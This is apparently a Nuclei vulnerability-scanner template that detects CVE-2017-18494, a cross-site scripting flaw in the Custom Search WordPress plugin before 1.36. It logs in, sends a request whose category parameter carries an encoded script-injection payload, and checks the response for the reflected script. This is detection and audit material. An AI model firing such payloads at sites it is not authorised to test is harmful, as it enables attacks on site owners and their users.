nuclei-templates/http/cves/2017/CVE-2017-18494.yaml

54 lines
2.0 KiB
YAML

id: CVE-2017-18494
info:
name: Custom Search by BestWebSoft < 1.36 - Cross-Site Scripting
author: luisfelipe146
severity: medium
description: |
The custom-search-plugin plugin before 1.36 for WordPress has multiple XSS issues.
reference:
- https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
- https://nvd.nist.gov/vuln/detail/CVE-2017-18494
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18494
- https://wordpress.org/plugins/custom-search-plugin/#developers
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-18494
cwe-id: CWE-79
epss-score: 0.00088
epss-percentile: 0.36857
cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: bestwebsoft
product: custom_search
framework: wordpress
publicwww-query: "/wp-content/plugins/custom-search-plugin/"
tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
- 'contains(body_3, "Custom Search by")'
condition: and
# digest: 4b0a00483046022100f9cc3cc8539a1d411d5a0fc2255808c1742059f86723ee77d65a025201fb801e022100d596c70a28642269afc2cafe1fecf0ff789694b8d7407ac813fd2a6adb176d89:922c64590222798bb761d5b6d8e72950